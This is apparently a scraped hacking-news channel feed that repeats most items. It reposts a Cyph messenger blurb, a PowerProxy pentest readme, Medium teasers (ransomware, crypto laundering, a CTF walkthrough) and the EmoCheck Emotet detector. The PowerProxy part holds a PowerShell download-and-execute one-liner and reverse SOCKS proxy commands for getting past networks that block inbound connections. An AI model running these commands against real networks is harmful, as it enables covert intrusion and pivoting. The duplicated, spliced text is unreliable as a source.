Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Cyph : Cryptographically Secure Messaging And Social Networking Service
Cyph is a cryptographically secure messaging and social networking service, providing an extreme level of privacy combined with best-in-class ease of use.
Cyph’s patented technology — built by former SpaceX engineers, audited by Cure53, and the basis of research presentations at Black Hat and DEF CON — uniquely allows Cyph to solve the major security and usability limitations of conventional solutions.
Commands available to run locally (Node.js and Docker required):
*
*
Running any of these commands for the first time will build the Docker image locally, which may take a while.
Cyph is run by founders Ryan Lester and Josh Boehm, former SpaceX engineers and best friends of over 20 years who had spent many all-nighters working closely together on various software projects. Cyph was initially started through the Mach37 Cyber Accelerator, and is currently backed by the Goel Fund and Center for Innovative Technology.
Cyph was a natural project for us to start together, as we’ve always shared an interest in cypherpunk efforts to enhance individual freedom and privacy.
We spent our teens getting into programming; tinkering with Tor, Linux, and OTR encryption; and mining Bitcoin before it was cool. As adults (who regularly handled ITAR-sensitive information at SpaceX), the difficulty of communicating privately online had become a palpable thorn in our side — existing solutions were cumbersome to use, missing basic features, and not really all that secure in practice. The revelations brought to light by Edward Snowden ultimately inspired us to take this upon ourselves.
We knew there could be a better way, so we created Cyph.
Download
___________________________
@hacking_Attack
@Hacking_Video
Cyph : Cryptographically Secure Messaging And Social Networking Service
Cyph is a cryptographically secure messaging and social networking service, providing an extreme level of privacy combined with best-in-class ease of use.
Cyph’s patented technology — built by former SpaceX engineers, audited by Cure53, and the basis of research presentations at Black Hat and DEF CON — uniquely allows Cyph to solve the major security and usability limitations of conventional solutions.
Commands available to run locally (Node.js and Docker required):
*
npm run serve: Serves a local instance at http://localhost:42002*
npm run verify: Verifies that the signed production build is reproducible against the local copy of the codeRunning any of these commands for the first time will build the Docker image locally, which may take a while.
Cyph is run by founders Ryan Lester and Josh Boehm, former SpaceX engineers and best friends of over 20 years who had spent many all-nighters working closely together on various software projects. Cyph was initially started through the Mach37 Cyber Accelerator, and is currently backed by the Goel Fund and Center for Innovative Technology.
Cyph was a natural project for us to start together, as we’ve always shared an interest in cypherpunk efforts to enhance individual freedom and privacy.
We spent our teens getting into programming; tinkering with Tor, Linux, and OTR encryption; and mining Bitcoin before it was cool. As adults (who regularly handled ITAR-sensitive information at SpaceX), the difficulty of communicating privately online had become a palpable thorn in our side — existing solutions were cumbersome to use, missing basic features, and not really all that secure in practice. The revelations brought to light by Edward Snowden ultimately inspired us to take this upon ourselves.
We knew there could be a better way, so we created Cyph.
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Cyph : Cryptographically Secure Messaging And Social Networking Service
Cyph is a cryptographically secure messaging and social networking service, providing an extreme level of privacy.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
PowerProxy : PowerShell SOCKS Proxy With Reverse Proxy Capabilities
PowerProxy is a PowerShell SOCKS proxy with reverse proxy capabilities.
PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections.
Setup
Import the script:
iex (new-object net.webclient).downloadstring(“http://192.168.0.22/PowerProxy.ps1”)
OR
Import-Module \192.168.0.22\Public\PowerProxy.ps1
reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL isn’t installed on your machine (it is on most Linux/Unix-based systems), provide your own cert or use the –no-encrypt option.
Usage
For detailed usage, check out PowerProxy’s help, or use ./reverse_proxy_handler.py –help
Run a reverse proxy
On local machine, start the handler:
Listen for reverse proxies on port 8080. Clients connect to port 1080 (default)
./reverse_proxy_handler.py -p 8080
In PowerShell:
Start-ReverseSocksProxy 172.1.1.20 -Port 8080
Proxy clients can treat the server created by reverse_proxy_handler.py as if it were the actual SOCKS server:
curl –socks4 127.0.0.1:1080 http://10.10.2.69/
Run a traditional SOCKS server
Start-SocksProxy 172.10.2.20 -Port 9050
Require authentication
Use PSCredential objects to require a username and password:
Create the credential
$Password = ConvertTo-SecureString -AsPlaintext -Force “Passw0rd123”
$Cred = New-Object System.Management.Automation.PSCredential (“ProxyUser”, $Password)
Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -Verbose
Download
___________________________
@hacking_Attack
@Hacking_Video
PowerProxy : PowerShell SOCKS Proxy With Reverse Proxy Capabilities
PowerProxy is a PowerShell SOCKS proxy with reverse proxy capabilities.
PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections.
Setup
Import the script:
iex (new-object net.webclient).downloadstring(“http://192.168.0.22/PowerProxy.ps1”)
OR
Import-Module \192.168.0.22\Public\PowerProxy.ps1
reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL isn’t installed on your machine (it is on most Linux/Unix-based systems), provide your own cert or use the –no-encrypt option.
Usage
For detailed usage, check out PowerProxy’s help, or use ./reverse_proxy_handler.py –help
Run a reverse proxy
On local machine, start the handler:
Listen for reverse proxies on port 8080. Clients connect to port 1080 (default)
./reverse_proxy_handler.py -p 8080
In PowerShell:
Start-ReverseSocksProxy 172.1.1.20 -Port 8080
Proxy clients can treat the server created by reverse_proxy_handler.py as if it were the actual SOCKS server:
curl –socks4 127.0.0.1:1080 http://10.10.2.69/
Run a traditional SOCKS server
Start-SocksProxy 172.10.2.20 -Port 9050
Require authentication
Use PSCredential objects to require a username and password:
Create the credential
$Password = ConvertTo-SecureString -AsPlaintext -Force “Passw0rd123”
$Cred = New-Object System.Management.Automation.PSCredential (“ProxyUser”, $Password)
Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -Verbose
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
PowerProxy : PowerShell SOCKS Proxy With Reverse Proxy Capabilities
PowerProxy is a PowerShell SOCKS proxy with reverse proxy capabilities. PowerProxy is written with penetration testers in mind.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Thrive Acquires DSM
DSM is now the third acquisition by Thrive in Florida in the past six months.
___________________________
@hacking_Attack
@Hacking_Video
Thrive Acquires DSM
DSM is now the third acquisition by Thrive in Florida in the past six months.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Thrive Acquires DSM
DSM is now the third acquisition by Thrive in Florida in the past six months.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How hackers launder and cash out their stolen crypto funds
https://cdn-images-1.medium.com/max/900/1*mFhUUP9V4t-D3LA51a4G0A.jpeg
Cryptocurrency thefts and hacks have become somewhat of a trend recently, as we’ve seen with the recent Ronin Bridge hack (Axie Infinity)…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How hackers launder and cash out their stolen crypto funds
https://cdn-images-1.medium.com/max/900/1*mFhUUP9V4t-D3LA51a4G0A.jpeg
Cryptocurrency thefts and hacks have become somewhat of a trend recently, as we’ve seen with the recent Ronin Bridge hack (Axie Infinity)…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How hackers launder and cash out their stolen crypto funds
Cryptocurrency thefts and hacks have become somewhat of a trend recently, as we’ve seen with the recent Ronin Bridge hack (Axie Infinity)…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Danger of Unsanitized Data
https://cdn-images-1.medium.com/max/1584/1*2awLcsEPQo0ma3UtGi-k2g.png
The tale of exploitation
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Danger of Unsanitized Data
https://cdn-images-1.medium.com/max/1584/1*2awLcsEPQo0ma3UtGi-k2g.png
The tale of exploitation
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Danger of Unsanitized Data
The tale of exploitation
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Ransomware with Python
https://cdn-images-1.medium.com/max/961/1*q1ddXOUO5vFmxuyY1EKKqw.png
Hello Medium Hackers,
Hope You all doing well.
Lets try something dangerous today.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Ransomware with Python
https://cdn-images-1.medium.com/max/961/1*q1ddXOUO5vFmxuyY1EKKqw.png
Hello Medium Hackers,
Hope You all doing well.
Lets try something dangerous today.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ransomware with Python
Hello Medium Hackers,
Hope You all doing well.
Lets try something dangerous today.
Hope You all doing well.
Lets try something dangerous today.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe CTF: Bounty Hacker — Walkthrough
https://cdn-images-1.medium.com/max/701/1*yN3n_8wQYogE-N5S4HNT8w.png
Hi! This is my walkthrough on hacking the Bounty Hacker CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe CTF: Bounty Hacker — Walkthrough
https://cdn-images-1.medium.com/max/701/1*yN3n_8wQYogE-N5S4HNT8w.png
Hi! This is my walkthrough on hacking the Bounty Hacker CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe CTF: Bounty Hacker — Walkthrough
Hi! This is my walkthrough on hacking the Bounty Hacker CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How I ‘hacked’ Wi-Fi at Railway Station to get free internet?
https://cdn-images-1.medium.com/max/625/1*IhuoaN8SVnJwCWikPSSbkQ.jpeg
(This blog is intended for educational purposes. I don’t want to go crazy over the website and I’m not responsible for any damage…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How I ‘hacked’ Wi-Fi at Railway Station to get free internet?
https://cdn-images-1.medium.com/max/625/1*IhuoaN8SVnJwCWikPSSbkQ.jpeg
(This blog is intended for educational purposes. I don’t want to go crazy over the website and I’m not responsible for any damage…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I ‘hacked’ Wi-Fi at Railway Station to get free internet?
(This blog is intended for educational purposes. I don’t want to go crazy over the website and I’m not responsible for any damage inflicted…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
La Autoridad de Protección de Datos de Italia advierte a los sitios web contra el uso de Google…
https://cdn-images-1.medium.com/max/1550/0*el_616dw7Hk9AaoY
PUBLICADO EN 27 JUNIO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
La Autoridad de Protección de Datos de Italia advierte a los sitios web contra el uso de Google…
https://cdn-images-1.medium.com/max/1550/0*el_616dw7Hk9AaoY
PUBLICADO EN 27 JUNIO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
La Autoridad de Protección de Datos de Italia advierte a los sitios web contra el uso de Google Analytics
PUBLICADO EN 27 JUNIO, 2022POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
EmoCheck - Emotet Detection Tool For Windows OS
https://blogger.googleusercontent.com/img/a/AVvXsEg2RQoIbn9z4-GWgujYIC3bkCJBxlMsX1hi7daniC-amFNdh-Y8l3vdE6FED3WFvr92897gGp7NmVUzT2IvC9HDM6hLL5POBEhko41rDpNISDi2ycIMdqUi-fiilkyJ13-nGnV8-a7-MOVkI1IQIqzzBAaEIEE1ezG23kZeohxIuy5WOsFaMSdUtMQq=w638-h640 Emotet detection tool for Windows OS. How to use1. Download EmoCheck from the Releases page.
2. Run EmoCheck on the host.
3. Check the exported report. DownloadPlease download from the Releases page. Command options(since v0.0.2)
* Specify output directory for the report (default: current directory)
*
*
*
*
*
Emotet generates their process name from a specific word dictionary and C drive serial number. EmoCheck scans the running process on the host, and find Emotet process from their process name.
(added in v0.0.2)
Emotet keeps their encoded process name in a specific registry key. EmoCheck looks up and decode the registry value, and find it from the process list. Code Signing with Microsoft Authenticode.
(added in v1.0)
Support the April 2020 updated of Emotet.
Obfuscated code.
(added in v2.0)
Support the December 2020 updated of Emotet.
French language support. (Thanks to CERT-FR) Sample ReportText stlye:
(v0.0.1)
* Initial release
* (Feb. 10, 2020) v0.0.2
* update detecting method
* add options
* (Aug. 11, 2020) v1.0.0
* update detecting method
* (Jan. 27, 2021) v2.0.0
* update detecting method
* Added French language support
* (Mar. 4, 2022) v2.1.0
* update detecting method
* (Mar. 14, 2022) v2.1.1
* Fixed a crash bug when executing with SYSTEM privileges
* (Apr. 22, 2022) v2.2.0
* update detecting method
* (May. 20, 2022) v2.3.0
* update detecting method
* (May. 24, 2022) v2.3.1
* fixed a detection pattern
* (May. 27, 2022) v2.3.2
* fixed a detection pattern LicensePlease read the LICENSE page. NotesTested environments* Windows 11 21H2 64bit Japanese Edition
* Windows 10 21H2 64bit Japanese Edition
* Windows 8.1 64bit Japanese Edition
* Windows 7 SP1 32bit Japanese Edition
* Windows 7 SP1 64bit Japanese Edition
Windows 7 does not support UTF-8 output in the Command Prompt. Build* Windows 10 1809 64bit Japanese Edition
* Microsoft Visual Studio Community 2017 Source codeNot published from v2.1. Download EmoCheck
___________________________
@hacking_Attack
@Hacking_Video
EmoCheck - Emotet Detection Tool For Windows OS
https://blogger.googleusercontent.com/img/a/AVvXsEg2RQoIbn9z4-GWgujYIC3bkCJBxlMsX1hi7daniC-amFNdh-Y8l3vdE6FED3WFvr92897gGp7NmVUzT2IvC9HDM6hLL5POBEhko41rDpNISDi2ycIMdqUi-fiilkyJ13-nGnV8-a7-MOVkI1IQIqzzBAaEIEE1ezG23kZeohxIuy5WOsFaMSdUtMQq=w638-h640 Emotet detection tool for Windows OS. How to use1. Download EmoCheck from the Releases page.
2. Run EmoCheck on the host.
3. Check the exported report. DownloadPlease download from the Releases page. Command options(since v0.0.2)
* Specify output directory for the report (default: current directory)
*
/output [your output directory]or -output [your output directory]* No console output *
/quietor -quiet* Export the report in JSON style *
/jsonor -json* Debug mode (no report) *
/debugor -debug* Show help *
/helpor -helpHow EmoCheck detects Emotet(v0.0.1)Emotet generates their process name from a specific word dictionary and C drive serial number. EmoCheck scans the running process on the host, and find Emotet process from their process name.
(added in v0.0.2)
Emotet keeps their encoded process name in a specific registry key. EmoCheck looks up and decode the registry value, and find it from the process list. Code Signing with Microsoft Authenticode.
(added in v1.0)
Support the April 2020 updated of Emotet.
Obfuscated code.
(added in v2.0)
Support the December 2020 updated of Emotet.
French language support. (Thanks to CERT-FR) Sample ReportText stlye:
[Emocheck v0.0.2]
Scan time: 2020-02-10 13:06:20
____________________________________________________
[Result]
Detected Emotet process.
[Emotet Process]
Process Name : mstask.exe
Process ID : 716
Image Path : C:\Users\[username]\AppData\Local\mstask.exe
____________________________________________________
Please remove or isolate the suspicious execution file. JSON style (added in v0.0.2): {
"scan_time":"2020-02-10 13:06:20",
"hostname":"[your hostname]",
"emocheck_version":"0.0.2",
"is_infected":"yes",
"emotet_processes":[
{
"process_name":"mstask.exe",
"process_id":"716",
"image_path":"C:\\Users\\[username]\\AppData\\Local\\mstask.exe"
}
]
}The report will be exported to the following path.(v0.0.1)
[current directory]\yyyymmddhhmmss_emocheck.txt(since v0.0.2) [output path]\[computer name]_yyyymmddhhmmss_emocheck.txt[output path]\[computer name]_yyyymmddhhmmss_emocheck.jsonScreenshot(v0.0.1) https://blogger.googleusercontent.com/img/a/AVvXsEg2RQoIbn9z4-GWgujYIC3bkCJBxlMsX1hi7daniC-amFNdh-Y8l3vdE6FED3WFvr92897gGp7NmVUzT2IvC9HDM6hLL5POBEhko41rDpNISDi2ycIMdqUi-fiilkyJ13-nGnV8-a7-MOVkI1IQIqzzBAaEIEE1ezG23kZeohxIuy5WOsFaMSdUtMQq=w638-h640 Releases* (Feb. 3, 2020) v0.0.1 * Initial release
* (Feb. 10, 2020) v0.0.2
* update detecting method
* add options
* (Aug. 11, 2020) v1.0.0
* update detecting method
* (Jan. 27, 2021) v2.0.0
* update detecting method
* Added French language support
* (Mar. 4, 2022) v2.1.0
* update detecting method
* (Mar. 14, 2022) v2.1.1
* Fixed a crash bug when executing with SYSTEM privileges
* (Apr. 22, 2022) v2.2.0
* update detecting method
* (May. 20, 2022) v2.3.0
* update detecting method
* (May. 24, 2022) v2.3.1
* fixed a detection pattern
* (May. 27, 2022) v2.3.2
* fixed a detection pattern LicensePlease read the LICENSE page. NotesTested environments* Windows 11 21H2 64bit Japanese Edition
* Windows 10 21H2 64bit Japanese Edition
* Windows 8.1 64bit Japanese Edition
* Windows 7 SP1 32bit Japanese Edition
* Windows 7 SP1 64bit Japanese Edition
Windows 7 does not support UTF-8 output in the Command Prompt. Build* Windows 10 1809 64bit Japanese Edition
* Microsoft Visual Studio Community 2017 Source codeNot published from v2.1. Download EmoCheck
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
EmoCheck - Emotet Detection Tool For Windows OS
MUST HAVE : Skill for Cyber Security Engineer
https://medium.com/@rommi.alvian/must-have-skill-for-cyber-security-engineer-eb7f749edf2c?source=rss------bug_bounty-5
Are you the one who has passion in Cyber Security engineer ? Lets talk the business, meant i will share the must-have skill you need to…Continue reading on Medium » (https://medium.com/@rommi.alvian/must-have-skill-for-cyber-security-engineer-eb7f749edf2c?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@rommi.alvian/must-have-skill-for-cyber-security-engineer-eb7f749edf2c?source=rss------bug_bounty-5
Are you the one who has passion in Cyber Security engineer ? Lets talk the business, meant i will share the must-have skill you need to…Continue reading on Medium » (https://medium.com/@rommi.alvian/must-have-skill-for-cyber-security-engineer-eb7f749edf2c?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
MUST HAVE : Skill for Cyber Security Engineer
Are you the one who has passion in Cyber Security engineer ? Lets talk the business, meant i will share the must-have skill you need to…